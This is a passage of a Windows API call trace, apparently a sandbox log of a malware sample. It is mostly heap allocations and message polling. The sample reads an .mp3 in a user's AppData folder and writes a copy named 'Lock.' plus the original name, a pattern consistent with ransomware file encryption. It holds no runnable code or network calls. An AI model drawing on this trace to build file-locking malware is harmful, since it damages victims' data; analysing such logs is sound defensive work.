HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0200.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/k3zAUT-8EHVGD9wmf.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k3zaut-8ehvgd9wmf.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0200.578] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.578] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0200.578] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.578] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.578] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.k3zAUT-8EHVGD9wmf.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.k3zaut-8ehvgd9wmf.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0200.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0200.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0200.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.580] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0200.580] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0200.582] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xdbe, lpOverlapped=0x0) returned 1 [0200.582] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0200.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10dbe) returned 0x24d7a58 [0200.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.590] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0200.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0200.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10dbe) returned 0x24d7a58 [0200.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0200.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10dbe) returned 0x34c3018 [0200.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.597] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0200.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 